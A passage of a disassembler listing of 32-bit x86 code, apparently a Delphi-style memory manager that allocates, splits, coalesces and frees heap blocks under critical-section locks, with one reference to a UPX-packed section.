call sub_4014B4
mov eax, [esp+24h+var_24]
xor edx, edx
mov [eax], edx
jmp short loc_40182B
; ---------------------------------------------------------------------------
loc_4017E3: ; CODE XREF: sub_401710+37�j
; sub_401710+9D�j
mov ebp, [ebx+8]
cmp esi, ebp
jnz short loc_401824
cmp edi, [ebx+0Ch]
jg short loc_401824
mov ecx, [esp+24h+var_24]
mov edx, edi
mov eax, ebp
call sub_40156C
mov eax, [esp+24h+var_24]
cmp dword ptr [eax], 0
jz short loc_40182B
mov eax, [esp+24h+var_24]
mov eax, [eax+4]
add [ebx+8], eax
mov eax, [esp+24h+var_24]
mov eax, [eax+4]
sub [ebx+0Ch], eax
cmp dword ptr [ebx+0Ch], 0
jnz short loc_40182B
mov eax, ebx
call sub_4012BC
jmp short loc_40182B
; ---------------------------------------------------------------------------
loc_401824: ; CODE XREF: sub_401710+D8�j
; sub_401710+DD�j
mov eax, [esp+24h+var_24]
xor edx, edx
mov [eax], edx
loc_40182B: ; CODE XREF: sub_401710+86�j
; sub_401710+D1�j ...
add esp, 14h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401710 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401834 proc near ; CODE XREF: sub_401C1C+40�p
; sub_401C1C+51�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
push ebx
push esi
push edi
add esp, 0FFFFFFECh
mov edi, ecx
mov [esp+20h+var_20], edx
lea ebx, [eax+3FFFh]
and ebx, 0FFFFC000h
mov esi, [esp+20h+var_20]
add esi, eax
and esi, 0FFFFC000h
cmp ebx, esi
jnb short loc_4018B5
mov ecx, edi
mov edx, esi
sub edx, ebx
mov eax, ebx
call sub_401600
lea ecx, [esp+20h+var_1C]
mov edx, edi
mov eax, offset dword_40C468
call sub_4012D4
mov ebx, [esp+20h+var_1C]
test ebx, ebx
jz short loc_40189E
lea ecx, [esp+20h+var_14]
mov edx, [esp+20h+var_18]
mov eax, ebx
call sub_4014B4
mov eax, [esp+20h+var_14]
mov [esp+20h+var_1C], eax
mov eax, [esp+20h+var_10]
mov [esp+20h+var_18], eax
loc_40189E: ; CODE XREF: sub_401834+49�j
cmp [esp+20h+var_1C], 0
jz short loc_4018B9
lea edx, [esp+20h+var_1C]
mov eax, offset dword_40C468
call sub_401348
jmp short loc_4018B9
; ---------------------------------------------------------------------------
loc_4018B5: ; CODE XREF: sub_401834+24�j
xor eax, eax
mov [edi], eax
loc_4018B9: ; CODE XREF: sub_401834+6F�j
; sub_401834+7F�j
add esp, 14h
pop edi
pop esi
pop ebx
retn
sub_401834 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018C0 proc near ; CODE XREF: sub_401F94+14�p
; sub_40211C+19�p ...
push ebp
mov ebp, esp
xor edx, edx
push ebp
push offset loc_401976
push dword ptr fs:[edx]
mov fs:[edx], esp
push offset dword_40C438
call sub_401214 ; InitializeCriticalSection
cmp byte_40C049, 0
jz short loc_4018EE
push offset dword_40C438
call sub_40121C ; RtlEnterCriticalSection
loc_4018EE: ; CODE XREF: sub_4018C0+22�j
mov eax, offset dword_40C458
call sub_401284
mov eax, offset dword_40C468
call sub_401284
mov eax, offset dword_40C494
call sub_401284
push 0FF8h
push 0
call sub_4011F4 ; LocalAlloc
mov dword_40C490, eax
cmp dword_40C490, 0
jz short loc_401955
mov eax, 3
loc_40192B: ; CODE XREF: sub_4018C0+7D�j
mov edx, dword_40C490
xor ecx, ecx
mov [edx+eax*4-0Ch], ecx
inc eax
cmp eax, 401h
jnz short loc_40192B
mov eax, offset off_40C478
mov [eax+4], eax
mov [eax], eax
mov off_40C484, eax
mov byte_40C430, 1
loc_401955: ; CODE XREF: sub_4018C0+64�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40197D
loc_401962: ; CODE XREF: sub_4018C0+BB�j
cmp byte_40C049, 0
jz short locret_401975
push offset dword_40C438
call sub_401224 ; RtlLeaveCriticalSection
locret_401975: ; CODE XREF: sub_4018C0+A9�j
retn
; ---------------------------------------------------------------------------
loc_401976: ; DATA XREF: sub_4018C0+6�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_401962
; ---------------------------------------------------------------------------
loc_40197D: ; DATA XREF: sub_4018C0+9D�o
mov al, byte_40C430
pop ebp
retn
sub_4018C0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401984 proc near ; CODE XREF: UPX0:004053B9�p
push ebp
mov ebp, esp
push ebx
cmp byte_40C430, 0
jz loc_401A61
xor edx, edx
push ebp
push offset loc_401A5A
push dword ptr fs:[edx]
mov fs:[edx], esp
cmp byte_40C049, 0
jz short loc_4019B6
push offset dword_40C438
call sub_40121C ; RtlEnterCriticalSection
loc_4019B6: ; CODE XREF: sub_401984+26�j
mov byte_40C430, 0
mov eax, dword_40C490
push eax
call sub_4011FC ; LocalFree
xor eax, eax
mov dword_40C490, eax
mov ebx, dword_40C458
jmp short loc_4019E9
; ---------------------------------------------------------------------------
loc_4019D7: ; CODE XREF: sub_401984+6B�j
push 8000h
push 0
mov eax, [ebx+8]
push eax
call sub_40120C ; VirtualFree
mov ebx, [ebx]
loc_4019E9: ; CODE XREF: sub_401984+51�j
cmp ebx, offset dword_40C458
jnz short loc_4019D7
mov eax, offset dword_40C458
call sub_401284
mov eax, offset dword_40C468
call sub_401284
mov eax, offset dword_40C494
call sub_401284
mov eax, dword_40C450
test eax, eax
jz short loc_401A2F
loc_401A18: ; CODE XREF: sub_401984+A9�j
mov edx, [eax]
mov dword_40C450, edx
push eax
call sub_4011FC ; LocalFree
mov eax, dword_40C450
test eax, eax
jnz short loc_401A18
loc_401A2F: ; CODE XREF: sub_401984+92�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_401A61
loc_401A3C: ; CODE XREF: sub_401984+DB�j
cmp byte_40C049, 0
jz short loc_401A4F
push offset dword_40C438
call sub_401224 ; RtlLeaveCriticalSection
loc_401A4F: ; CODE XREF: sub_401984+BF�j
push offset dword_40C438
call sub_40122C ; RtlDeleteCriticalSection
retn
; ---------------------------------------------------------------------------
loc_401A5A: ; DATA XREF: sub_401984+14�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_401A3C
; ---------------------------------------------------------------------------
loc_401A61: ; CODE XREF: sub_401984+B�j
; DATA XREF: sub_401984+B3�o
pop ebx
pop ebp
retn
sub_401984 endp
; =============== S U B R O U T I N E =======================================
sub_401A64 proc near ; CODE XREF: sub_401B74:loc_401BD5�p
; sub_401BE4+23�p ...
push ebx
cmp eax, off_40C484
jnz short loc_401A76
mov edx, [eax+4]
mov off_40C484, edx
loc_401A76: ; CODE XREF: sub_401A64+7�j
mov edx, [eax+4]
mov ecx, [eax+8]
cmp ecx, 1000h
jg short loc_401ABC
cmp eax, edx
jnz short loc_401A9F
test ecx, ecx
jns short loc_401A8F
add ecx, 3
loc_401A8F: ; CODE XREF: sub_401A64+26�j
sar ecx, 2
mov eax, dword_40C490
xor edx, edx
mov [eax+ecx*4-0Ch], edx
jmp short loc_401AC3
; ---------------------------------------------------------------------------
loc_401A9F: ; CODE XREF: sub_401A64+22�j
test ecx, ecx
jns short loc_401AA6
add ecx, 3
loc_401AA6: ; CODE XREF: sub_401A64+3D�j
sar ecx, 2
mov ebx, dword_40C490
mov [ebx+ecx*4-0Ch], edx
mov eax, [eax]
mov [edx], eax
mov [eax+4], edx
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401ABC: ; CODE XREF: sub_401A64+1E�j
mov eax, [eax]
mov [edx], eax
mov [eax+4], edx
loc_401AC3: ; CODE XREF: sub_401A64+39�j
pop ebx
retn
sub_401A64 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401AC8 proc near ; CODE XREF: sub_401C1C+D�p
mov edx, dword_40C494
jmp short loc_401AE0
; ---------------------------------------------------------------------------
loc_401AD0: ; CODE XREF: sub_401AC8+1E�j
mov ecx, [edx+8]
cmp eax, ecx
jb short loc_401ADE
add ecx, [edx+0Ch]
cmp eax, ecx
jb short loc_401AF4
loc_401ADE: ; CODE XREF: sub_401AC8+D�j
mov edx, [edx]
loc_401AE0: ; CODE XREF: sub_401AC8+6�j
cmp edx, offset dword_40C494
jnz short loc_401AD0
mov dword_40C434, 3
xor edx, edx
loc_401AF4: ; CODE XREF: sub_401AC8+14�j
mov eax, edx
retn
sub_401AC8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401AF8 proc near ; CODE XREF: sub_401C1C+67�p
; sub_401D88+68�p
push ebx
mov ecx, edx
sub ecx, 4
lea ebx, [ecx+eax]
cmp edx, 10h
jl short loc_401B15
mov dword ptr [ebx], 80000007h
mov edx, ecx
call sub_401CB4
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401B15: ; CODE XREF: sub_401AF8+C�j
cmp edx, 4
jl short loc_401B26
mov ecx, edx
or ecx, 80000002h
mov [eax], ecx
mov [ebx], ecx
loc_401B26: ; CODE XREF: sub_401AF8+20�j
pop ebx
retn
sub_401AF8 endp
; =============== S U B R O U T I N E =======================================
sub_401B28 proc near ; CODE XREF: sub_401B4C+D�p
; sub_401D3C+36�p ...
inc dword_40C424
mov edx, eax
sub edx, 4
mov edx, [edx]
and edx, 7FFFFFFCh
sub edx, 4
add dword_40C428, edx
call sub_40211C
retn
sub_401B28 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401B4C proc near ; CODE XREF: sub_401C1C+81�p
cmp edx, 0Ch
jl short loc_401B5F
or edx, 2
mov [eax], edx
add eax, 4
call sub_401B28
retn
; ---------------------------------------------------------------------------
loc_401B5F: ; CODE XREF: sub_401B4C+3�j
cmp edx, 4
jl short loc_401B6E
mov ecx, edx
or ecx, 80000002h
mov [eax], ecx
loc_401B6E: ; CODE XREF: sub_401B4C+16�j
add eax, edx
and dword ptr [eax], 0FFFFFFFEh
retn
sub_401B4C endp
; =============== S U B R O U T I N E =======================================
sub_401B74 proc near ; CODE XREF: sub_401D88+36�p
push ebx
push esi
mov edx, eax
sub edx, 4
mov edx, [edx]
mov ecx, edx
and ecx, 80000002h
cmp ecx, 80000002h
jz short loc_401B97
mov dword_40C434, 4
loc_401B97: ; CODE XREF: sub_401B74+17�j
mov ebx, edx
and ebx, 7FFFFFFCh
sub eax, ebx
mov ecx, eax
xor edx, [ecx]
test edx, 0FFFFFFFEh
jz short loc_401BB7
mov dword_40C434, 5
loc_401BB7: ; CODE XREF: sub_401B74+37�j
test byte ptr [ecx], 1
jz short loc_401BDC
mov edx, eax
sub edx, 0Ch
mov esi, [edx+8]
sub eax, esi
cmp esi, [eax+8]
jz short loc_401BD5
mov dword_40C434, 6
loc_401BD5: ; CODE XREF: sub_401B74+55�j
call sub_401A64
add ebx, esi
loc_401BDC: ; CODE XREF: sub_401B74+46�j
mov eax, ebx
pop esi
pop ebx
retn
sub_401B74 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401BE4 proc near ; CODE XREF: sub_401D88+4F�p
push ebx
push esi
push edi
mov ebx, eax
xor edi, edi
mov eax, [ebx]
test eax, 80000000h
jz short loc_401BFF
and eax, 7FFFFFFCh
add edi, eax
add ebx, eax
mov eax, [ebx]
loc_401BFF: ; CODE XREF: sub_401BE4+E�j
test al, 2
jnz short loc_401C16
mov esi, ebx
mov eax, esi
call sub_401A64
mov eax, [esi+8]
add edi, eax
add ebx, eax
and dword ptr [ebx], 0FFFFFFFEh
loc_401C16: ; CODE XREF: sub_401BE4+1D�j
mov eax, edi
pop edi
pop esi
pop ebx
retn
sub_401BE4 endp
; =============== S U B R O U T I N E =======================================
sub_401C1C proc near ; CODE XREF: sub_401CB4+61�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF8h
mov edi, edx
mov esi, eax
mov eax, esi
call sub_401AC8
mov ebx, eax
mov ebp, [ebx+8]
mov eax, ebp
add eax, [ebx+0Ch]
mov edx, eax
lea ecx, [edi+esi]
sub edx, ecx
cmp edx, 0Ch
jg short loc_401C48
mov edi, eax
sub edi, esi
loc_401C48: ; CODE XREF: sub_401C1C+26�j
mov eax, esi
sub eax, ebp
cmp eax, 0Ch
jge short loc_401C63
mov ecx, esp
mov edx, esi
sub edx, [ebx+8]
add edx, edi
mov eax, ebp
call sub_401834
jmp short loc_401C72
; ---------------------------------------------------------------------------
loc_401C63: ; CODE XREF: sub_401C1C+33�j
mov ecx, esp
mov edx, edi
sub edx, 4
lea eax, [esi+4]
call sub_401834
loc_401C72: ; CODE XREF: sub_401C1C+45�j
mov ebp, [esp+18h+var_18]
test ebp, ebp
jnz short loc_401C7D
xor eax, eax
jmp short loc_401CAD
; ---------------------------------------------------------------------------
loc_401C7D: ; CODE XREF: sub_401C1C+5B�j
mov edx, ebp
sub edx, esi
mov eax, esi
call sub_401AF8
mov eax, ebp
add eax, [esp+18h+var_14]
mov edx, [ebx+8]
add edx, [ebx+0Ch]
cmp eax, edx
jnb short loc_401CA2
lea edx, [edi+esi]
sub edx, eax
call sub_401B4C
loc_401CA2: ; CODE XREF: sub_401C1C+7A�j
mov edx, esp
mov eax, ebx
call sub_401348
mov al, 1
loc_401CAD: ; CODE XREF: sub_401C1C+5F�j
pop ecx
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401C1C endp
; =============== S U B R O U T I N E =======================================
sub_401CB4 proc near ; CODE XREF: sub_401AF8+16�p
; sub_401EA0+BB�p ...
push ebx
push esi
push edi
mov esi, edx
mov edi, eax
mov ebx, edi
mov [ebx+8], esi
mov eax, ebx
add eax, esi
sub eax, 0Ch
mov [eax+8], esi
cmp esi, 1000h
jg short loc_401D09
mov edx, esi
test edx, edx
jns short loc_401CDB
add edx, 3
loc_401CDB: ; CODE XREF: sub_401CB4+22�j
sar edx, 2
mov eax, dword_40C490
mov eax, [eax+edx*4-0Ch]
test eax, eax
jnz short loc_401CFB
mov eax, dword_40C490
mov [eax+edx*4-0Ch], ebx
mov [ebx+4], ebx
mov [ebx], ebx
jmp short loc_401D35
; ---------------------------------------------------------------------------
loc_401CFB: ; CODE XREF: sub_401CB4+35�j
mov edx, [eax]
mov [ebx+4], eax
mov [ebx], edx
mov [eax], ebx
mov [edx+4], ebx
jmp short loc_401D35
; ---------------------------------------------------------------------------
loc_401D09: ; CODE XREF: sub_401CB4+1C�j
cmp esi, 3C00h
jl short loc_401D1E
mov edx, esi
mov eax, edi
call sub_401C1C
test al, al
jnz short loc_401D35
loc_401D1E: ; CODE XREF: sub_401CB4+5B�j
mov eax, off_40C484
mov off_40C484, ebx
mov edx, [eax]
mov [ebx+4], eax
mov [ebx], edx
mov [eax], ebx
mov [edx+4], ebx
loc_401D35: ; CODE XREF: sub_401CB4+45�j
; sub_401CB4+53�j ...
pop edi
pop esi
pop ebx
retn
sub_401CB4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401D3C proc near ; CODE XREF: sub_401D88+F�p
; sub_40211C+100�p ...
cmp dword_40C488, 0
jle short locret_401D85
cmp dword_40C488, 0Ch
jge short loc_401D5A
mov dword_40C434, 7
jmp short locret_401D85
; ---------------------------------------------------------------------------
loc_401D5A: ; CODE XREF: sub_401D3C+10�j
mov eax, dword_40C488
or eax, 2
mov edx, dword_40C48C
mov [edx], eax
mov eax, dword_40C48C
add eax, 4
call sub_401B28
xor eax, eax
mov dword_40C48C, eax
xor eax, eax
mov dword_40C488, eax
locret_401D85: ; CODE XREF: sub_401D3C+7�j
; sub_401D3C+1C�j
retn
sub_401D3C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401D88 proc near ; CODE XREF: sub_401E14+18�p
; sub_401E40+1D�p
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
push ebx
push esi
push edi
add esp, 0FFFFFFF0h
mov esi, eax
lea edi, [esp+1Ch+var_1C]
movsd
movsd
mov edi, esp
call sub_401D3C
lea ecx, [esp+1Ch+var_14]
mov edx, edi
mov eax, offset dword_40C494
call sub_4012D4
mov ebx, [esp+1Ch+var_14]
test ebx, ebx
jnz short loc_401DB8
xor eax, eax
jmp short loc_401E0A
; ---------------------------------------------------------------------------
loc_401DB8: ; CODE XREF: sub_401D88+2A�j
mov eax, [edi]
cmp ebx, eax
jnb short loc_401DC8
call sub_401B74
sub [edi], eax
add [edi+4], eax
loc_401DC8: ; CODE XREF: sub_401D88+34�j
mov eax, [edi]
add eax, [edi+4]
mov esi, ebx
add esi, [esp+1Ch+var_10]
cmp eax, esi
jnb short loc_401DDF
call sub_401BE4
add [edi+4], eax
loc_401DDF: ; CODE XREF: sub_401D88+4D�j
mov eax, [edi]
add eax, [edi+4]
cmp esi, eax
jnz short loc_401DF9
sub eax, 4
mov edx, 4
call sub_401AF8
sub dword ptr [edi+4], 4
loc_401DF9: ; CODE XREF: sub_401D88+5E�j
mov eax, [edi]
mov dword_40C48C, eax
mov eax, [edi+4]
mov dword_40C488, eax
mov al, 1
loc_401E0A: ; CODE XREF: sub_401D88+2E�j
add esp, 10h
pop edi
pop esi
pop ebx
retn
sub_401D88 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401E14 proc near ; CODE XREF: sub_401EA0+57�p
var_C = dword ptr -0Ch
push ebx
add esp, 0FFFFFFF8h
mov ebx, eax
mov edx, esp
lea eax, [ebx+4]
call sub_401680
cmp [esp+0Ch+var_C], 0
jz short loc_401E35
mov eax, esp
call sub_401D88
test al, al
jnz short loc_401E39
loc_401E35: ; CODE XREF: sub_401E14+14�j
xor eax, eax
jmp short loc_401E3B
; ---------------------------------------------------------------------------
loc_401E39: ; CODE XREF: sub_401E14+1F�j
mov al, 1
loc_401E3B: ; CODE XREF: sub_401E14+23�j
pop ecx
pop edx
pop ebx
retn
sub_401E14 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401E40 proc near ; CODE XREF: sub_4022C0+199�p
var_10 = dword ptr -10h
push ebx
push esi
add esp, 0FFFFFFF8h
mov esi, edx
mov ebx, eax
mov ecx, esp
lea edx, [esi+4]
mov eax, ebx
call sub_401710
cmp [esp+10h+var_10], 0
jz short loc_401E66
mov eax, esp
call sub_401D88
test al, al
jnz short loc_401E6A
loc_401E66: ; CODE XREF: sub_401E40+19�j
xor eax, eax
jmp short loc_401E6C
; ---------------------------------------------------------------------------
loc_401E6A: ; CODE XREF: sub_401E40+24�j
mov al, 1
loc_401E6C: ; CODE XREF: sub_401E40+28�j
pop ecx
pop edx
pop esi
pop ebx
retn
sub_401E40 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401E74 proc near ; CODE XREF: sub_401EA0+4A�p
xor edx, edx
test eax, eax
jns short loc_401E7D
add eax, 3
loc_401E7D: ; CODE XREF: sub_401E74+4�j
sar eax, 2
cmp eax, 400h
jg short loc_401E9D
loc_401E87: ; CODE XREF: sub_401E74+27�j
mov edx, dword_40C490
mov edx, [edx+eax*4-0Ch]
test edx, edx
jnz short loc_401E9D
inc eax
cmp eax, 401h
jnz short loc_401E87
loc_401E9D: ; CODE XREF: sub_401E74+11�j
; sub_401E74+1F�j
mov eax, edx
retn
sub_401E74 endp
; =============== S U B R O U T I N E =======================================
sub_401EA0 proc near ; CODE XREF: sub_401F94+14B�p
push ebx
push esi
push edi
push ebp
mov esi, eax
mov edi, offset off_40C484
mov ebp, offset dword_40C488
loc_401EB0: ; CODE XREF: sub_401EA0+6A�j
mov ebx, off_40C47C
cmp esi, [ebx+8]
jle loc_401F43
mov ebx, [edi]
mov eax, [ebx+8]
cmp esi, eax
jle short loc_401F43
mov [ebx+8], esi
loc_401ECB: ; CODE XREF: sub_401EA0+31�j
mov ebx, [ebx+4]
cmp esi, [ebx+8]
jg short loc_401ECB
mov edx, [edi]
mov [edx+8], eax
cmp ebx, [edi]
jz short loc_401EE0
mov [edi], ebx
jmp short loc_401F43
; ---------------------------------------------------------------------------
loc_401EE0: ; CODE XREF: sub_401EA0+3A�j
cmp esi, 1000h
jg short loc_401EF5
mov eax, esi
call sub_401E74
mov ebx, eax
test ebx, ebx
jnz short loc_401F43
loc_401EF5: ; CODE XREF: sub_401EA0+46�j
mov eax, esi
call sub_401E14
test al, al
jnz short loc_401F07
xor eax, eax
jmp loc_401F8F
; ---------------------------------------------------------------------------
loc_401F07: ; CODE XREF: sub_401EA0+5E�j
cmp esi, [ebp+0]
jg short loc_401EB0
sub [ebp+0], esi
cmp dword ptr [ebp+0], 0Ch
jge short loc_401F1D
add esi, [ebp+0]
xor eax, eax
mov [ebp+0], eax
loc_401F1D: ; CODE XREF: sub_401EA0+73�j
mov eax, dword_40C48C
add dword_40C48C, esi
mov edx, esi
or edx, 2
mov [eax], edx
add eax, 4
inc dword_40C424
sub esi, 4
add dword_40C428, esi
jmp short loc_401F8F
; ---------------------------------------------------------------------------
loc_401F43: ; CODE XREF: sub_401EA0+19�j
; sub_401EA0+26�j ...
mov eax, ebx
call sub_401A64
mov edx, [ebx+8]
mov eax, edx
sub eax, esi
cmp eax, 0Ch
jl short loc_401F62
mov edx, ebx
add edx, esi
xchg eax, edx
call sub_401CB4
jmp short loc_401F74
; ---------------------------------------------------------------------------
loc_401F62: ; CODE XREF: sub_401EA0+B4�j
mov esi, edx
cmp ebx, [edi]
jnz short loc_401F6D
mov eax, [ebx+4]
mov [edi], eax
loc_401F6D: ; CODE XREF: sub_401EA0+C6�j
mov eax, ebx
add eax, esi
and dword ptr [eax], 0FFFFFFFEh
loc_401F74: ; CODE XREF: sub_401EA0+C0�j
mov eax, ebx
mov edx, esi
or edx, 2
mov [eax], edx
add eax, 4
inc dword_40C424
sub esi, 4
add dword_40C428, esi
loc_401F8F: ; CODE XREF: sub_401EA0+62�j
; sub_401EA0+A1�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401EA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401F94 proc near ; CODE XREF: sub_402490+5C�p
; sub_402554+4�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push ebx
push esi
push edi
mov ebx, eax
cmp byte_40C430, 0
jnz short loc_401FBB
call sub_4018C0
test al, al
jnz short loc_401FBB
xor eax, eax
mov [ebp+var_4], eax
jmp loc_40210F
; ---------------------------------------------------------------------------
loc_401FBB: ; CODE XREF: sub_401F94+12�j
; sub_401F94+1B�j
xor ecx, ecx
push ebp
push offset loc_402108
push dword ptr fs:[ecx]
mov fs:[ecx], esp
cmp byte_40C049, 0
jz short loc_401FDC
push offset dword_40C438
call sub_40121C ; RtlEnterCriticalSection
loc_401FDC: ; CODE XREF: sub_401F94+3C�j
add ebx, 7
and ebx, 0FFFFFFFCh
cmp ebx, 0Ch
jge short loc_401FEC
mov ebx, 0Ch
loc_401FEC: ; CODE XREF: sub_401F94+51�j
cmp ebx, 1000h
jg loc_40208B
mov eax, ebx
test eax, eax
jns short loc_402001
add eax, 3
loc_402001: ; CODE XREF: sub_401F94+68�j
sar eax, 2
mov edx, dword_40C490
mov edx, [edx+eax*4-0Ch]
test edx, edx
jz short loc_40208B
mov esi, edx
mov eax, esi
add eax, ebx
and dword ptr [eax], 0FFFFFFFEh
mov eax, [edx+4]
cmp edx, eax
jnz short loc_40203C
mov eax, ebx
test eax, eax
jns short loc_40202B
add eax, 3
loc_40202B: ; CODE XREF: sub_401F94+92�j
sar eax, 2
mov ecx, dword_40C490
xor edi, edi
mov [ecx+eax*4-0Ch], edi
jmp short loc_402062
; ---------------------------------------------------------------------------
loc_40203C: ; CODE XREF: sub_401F94+8C�j
mov ecx, ebx
test ecx, ecx
jns short loc_402045
add ecx, 3
loc_402045: ; CODE XREF: sub_401F94+AC�j
sar ecx, 2
mov edi, dword_40C490
mov [edi+ecx*4-0Ch], eax
mov ecx, [edx]
mov [ebp+var_8], ecx
mov ecx, [ebp+var_8]
mov [ecx+4], eax
mov ecx, [ebp+var_8]
mov [eax], ecx
loc_402062: ; CODE XREF: sub_401F94+A6�j
mov eax, esi
mov edx, [edx+8]
or edx, 2
mov [eax], edx
add eax, 4
mov [ebp+var_4], eax
inc dword_40C424
sub ebx, 4
add dword_40C428, ebx
call sub_402D38
jmp loc_40210F
; ---------------------------------------------------------------------------
loc_40208B: ; CODE XREF: sub_401F94+5E�j
; sub_401F94+7C�j
cmp ebx, dword_40C488
jg short loc_4020DD
sub dword_40C488, ebx
cmp dword_40C488, 0Ch
jge short loc_4020AF
add ebx, dword_40C488
xor eax, eax
mov dword_40C488, eax
loc_4020AF: ; CODE XREF: sub_401F94+10C�j
mov eax, dword_40C48C
add dword_40C48C, ebx
mov edx, ebx
or edx, 2
mov [eax], edx
add eax, 4
mov [ebp+var_4], eax
inc dword_40C424
sub ebx, 4
add dword_40C428, ebx
call sub_402D38
jmp short loc_40210F
; ---------------------------------------------------------------------------
loc_4020DD: ; CODE XREF: sub_401F94+FD�j
mov eax, ebx
call sub_401EA0
mov [ebp+var_4], eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40210F
loc_4020F4: ; CODE XREF: sub_401F94+179�j
cmp byte_40C049, 0
jz short locret_402107
push offset dword_40C438
call sub_401224 ; RtlLeaveCriticalSection
locret_402107: ; CODE XREF: sub_401F94+167�j
retn
; ---------------------------------------------------------------------------
loc_402108: ; DATA XREF: sub_401F94+2A�o
jmp loc_402C60
; ---------------------------------------------------------------------------
jmp short loc_4020F4
; ---------------------------------------------------------------------------
loc_40210F: ; CODE XREF: sub_401F94+22�j
; sub_401F94+F2�j ...
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
pop ecx
pop ecx
pop ebp
retn
sub_401F94 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40211C proc near ; CODE XREF: sub_401B28+1C�p
; sub_402490+88�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov ebx, eax
xor eax, eax
mov dword_40C434, eax
cmp byte_40C430, 0
jnz short loc_402154
call sub_4018C0
test al, al
jnz short loc_402154
mov dword_40C434, 8
mov [ebp+var_4], 8
jmp loc_4022B5
; ---------------------------------------------------------------------------
loc_402154: ; CODE XREF: sub_40211C+17�j
; sub_40211C+20�j
xor ecx, ecx
push ebp
push offset loc_4022AE
push dword ptr fs:[ecx]
mov fs:[ecx], esp
cmp byte_40C049, 0
jz short loc_402175
push offset dword_40C438
call sub_40121C ; RtlEnterCriticalSection
loc_402175: ; CODE XREF: sub_40211C+4D�j
mov esi, ebx
sub esi, 4
mov ebx, [esi]
test bl, 2
jnz short loc_402190
mov dword_40C434, 9
jmp loc_402285
; ---------------------------------------------------------------------------
loc_402190: ; CODE XREF: sub_40211C+63�j
dec dword_40C424
mov eax, ebx
and eax, 7FFFFFFCh
sub eax, 4
sub dword_40C428, eax
test bl, 1
jz short loc_4021F0
mov eax, esi
sub eax, 0Ch
mov edx, [eax+8]
cmp edx, 0Ch
jl short loc_4021C0
test edx, 80000003h
jz short loc_4021CF
loc_4021C0: ; CODE XREF: sub_40211C+9A�j
mov dword_40C434, 0Ah
jmp loc_402285
; ---------------------------------------------------------------------------
loc_4021CF: ; CODE XREF: sub_40211C+A2�j
mov eax, esi
sub eax, edx
cmp edx, [eax+8]
jz short loc_4021E7
mov dword_40C434, 0Ah
jmp loc_402285
; ---------------------------------------------------------------------------
loc_4021E7: ; CODE XREF: sub_40211C+BA�j
add ebx, edx
mov esi, eax
call sub_401A64
loc_4021F0: ; CODE XREF: sub_40211C+8D�j
and ebx, 7FFFFFFCh
mov eax, esi
add eax, ebx
mov edi, eax
cmp edi, dword_40C48C
jnz short loc_402230
sub dword_40C48C, ebx
add dword_40C488, ebx
cmp dword_40C488, 3C00h
jle short loc_402221
call sub_401D3C
loc_402221: ; CODE XREF: sub_40211C+FE�j
xor eax, eax
mov [ebp+var_4], eax
call sub_402D38
jmp loc_4022B5
; ---------------------------------------------------------------------------
loc_402230: ; CODE XREF: sub_40211C+E6�j
mov edx, [eax]
test dl, 2
jz short loc_402253
and edx, 7FFFFFFCh
cmp edx, 4
jge short loc_40224E
mov dword_40C434, 0Bh
jmp short loc_402285
; ---------------------------------------------------------------------------
loc_40224E: ; CODE XREF: sub_40211C+124�j
or dword ptr [eax], 1
jmp short loc_40227C
; ---------------------------------------------------------------------------
loc_402253: ; CODE XREF: sub_40211C+119�j
mov eax, edi
cmp dword ptr [eax+4], 0
jz short loc_402266
cmp dword ptr [eax], 0
jz short loc_402266
cmp dword ptr [eax+8], 0Ch
jge short loc_402272
loc_402266: ; CODE XREF: sub_40211C+13D�j
; sub_40211C+142�j
mov dword_40C434, 0Bh
jmp short loc_402285
; ---------------------------------------------------------------------------
loc_402272: ; CODE XREF: sub_40211C+148�j
mov edx, [eax+8]
add ebx, edx
call sub_401A64
loc_40227C: ; CODE XREF: sub_40211C+135�j
mov edx, ebx
mov eax, esi
call sub_401CB4
loc_402285: ; CODE XREF: sub_40211C+6F�j
; sub_40211C+AE�j ...
mov eax, dword_40C434
mov [ebp+var_4], eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4022B5
loc_40229A: ; CODE XREF: sub_40211C+197�j
cmp byte_40C049, 0
jz short locret_4022AD
push offset dword_40C438
